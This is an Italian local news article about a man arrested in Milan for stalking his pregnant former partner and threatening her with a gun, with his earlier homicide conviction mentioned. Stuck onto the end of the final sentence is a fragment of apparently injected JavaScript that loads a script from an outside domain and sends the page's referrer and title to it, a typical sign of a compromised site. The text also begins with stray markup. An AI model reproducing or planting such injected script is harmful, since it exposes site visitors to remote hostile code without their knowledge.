"/>
lunedì 21 agosto 2017 06:34:06
omnimilano

Aggredisce con una pistola la ex incinta
In passato era già stato condannato per l’omicidio della suocera

6 dicembre 2016 Cronaca

Arrestato per atti persecutori ieri un 42enne italiano, Francesco Palmisano. La vittima è una 31enne italiana che lo aveva appena lasciato. Sul posto è intervenuta la polizia. In base a quanto ricostruito, lui la disturbava da qualche giorno, appena lei gli aveva comunicato di voler interrompere la relazione. Ieri l’ha raggiunta in via Tibaldi mentre era a bordo del tram 90, lui era in compagnia del figlio 14enne avuto da una precedente relazione, lei era appena uscita dal lavoro. Estraendo una pistola, non rintracciata, l’ha minacciata e aggredita fino all’arrivo della polizia che lo ha inseguito e arrestato vicino a casa sua, in zona Baggio. L’uomo ha numerosi precedenti, soprattutto maltrattamenti e aggressioni, nel 2006 ha ucciso la suocera, ed è finito in carcere per omicidio volontario. La vittima ha conosciuto l’uomo nel 2013, quando è uscito dal carcere, ed è attualmente incinta, elemento che aggrava le accuse nei confronti dell’uomo. Pochi giorni fa la donna aveva denunciato Palmisano presso una stazione dei carabinieri, a seguito delle sue insistenze dopo che lo aveva lasciato.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo